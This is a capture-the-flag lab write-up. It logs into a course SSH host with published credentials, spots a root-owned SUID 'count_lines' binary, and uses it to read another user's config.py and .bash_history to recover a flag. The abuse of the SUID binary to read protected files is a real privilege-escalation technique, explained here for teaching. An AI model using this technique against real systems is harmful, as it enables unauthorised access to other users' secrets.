Hey, look at my essay!
Description
We have provided SSH access to a Linux system for you. You reach it via sfl.cs.tu-dortmund.de on port 10007. Credentials: sfl / buffer_overflow. Now go connect to it and have a look around. You may find some strange files...
Hint: c3NoIHNmbEBzZmwuY3MudHUtZG9ydG11bmQuZGUgLXAgMTAwMDcgLVA=
Solution
Login to the server.
Then we can take a look around.. There is a folder "Desktop" and inside it, a folder "essay" and also some "util" folder with some binary files:
sfl@c9bea22563ec:/home/sfl/Desktop/essays/util$ ls -al
# total 68
# drwxr-xr-x 2 root root 4096 Jan 10 12:27 .
# drwxr-xr-x 3 root root 4096 Jan 8 17:29 ..
# -rwxr-xr-x 1 www www 17104 Jan 8 17:27 count_chars
# -rwsr-xr-x 1 root root 17144 Jan 9 20:29 count_lines
# -rwxr-xr-x 1 www www 17048 Jan 7 10:46 count_words
Also there is an adittional user folder at "/home/www/" with the following files:
sfl@c9bea22563ec:/home/www$ ls -al
# total 36
# drwxr-xr-x 4 www www 4096 Jan 10 12:22 .
# drwxr-xr-x 4 root root 4096 Jan 12 15:33 ..
# -rw------- 1 www www 804 Jan 9 20:38 .bash_history
# -rw-r--r-- 1 www www 220 Jan 8 15:29 .bash_logout
# -rw-r--r-- 1 www www 3526 Jan 8 15:29 .bashrc
# drwxr-xr-x 3 www www 4096 Jan 8 16:53 .local
# -rw-r--r-- 1 www www 807 Jan 8 15:29 .profile
# drwxr-xr-x 2 www www 4096 Jan 9 15:41 __pycache__
# -rwxr----- 1 www www 199 Jan 9 15:41 config.py
Unfortunately, as user sfl we are unable to open any of this files.
But if you look back at the files in the "util" folder there is something odd (try it yourself before scrolling further).
...
Did you try it?
...
It's not that hard
...
One file has someting diffent
...
---
...
🠗
-rwsr-xr-x 1 root root 17144 Jan 9 20:29 count_lines
🠕
The binary is owned by user root and has the suid bit set! We can execute it to access everything the root user can access.
So lets take a look at the config.py file:
sfl@c9bea22563ec:/home/sfl$ /home/sfl/Desktop/essays/util/count_lines /home/www/config.py
# from flask import Flask
# import os
#
# app = Flask(__name__)
#
# @app.route("/66041164-0c4e-4f23-8ef1-7b6856c5e32d")
# def hello_world():
# FLAG = str(os.environ.get('WWW_FLAG'))
# return "<p>" + FLAG + "</p>"
#
# 7 lines written
So the flag must be written somewhere in the environment of the running server. But our tool can only read files. Lets try another file, maybe the "www"-user set the "flag-variable" via the terminal? All the commands entered into the terminal are saved in a ".bash_history" file. And if we open the file there it is. The final command is:
/home/sfl/Desktop/essays/util/count_lines /home/www/.bash_history
# ls
# export WWW_FLAG=fl4g{b3_c4r3ful_w1th_suid_bit}
# printenv
# ls
# python3 config.py
# apt install python3-pip
# sudo apt install python3-pip
# ...
Another possible approach is to read the environment variable from the place it was written to in config.py.
The config file starts a Flask app, which is a Python web framework. So /66041164-0c4e-4f23-8ef1-7b6856c5e32d is probably a path in a web app that is running on this system. To access this web app, we now just need to request it by its URL. For the hostname, we can just use localhost or 127.0.0.1 (both point directly to the system the request is sent from).
To send a request, we can now use curl (inside the SSH session): curl http://localhost/66041164-0c4e-4f23-8ef1-7b6856c5e32d
The response of the running Flask server contains the flag:
<p>fl4g{b3_c4r3ful_w1th_suid_bit}</p>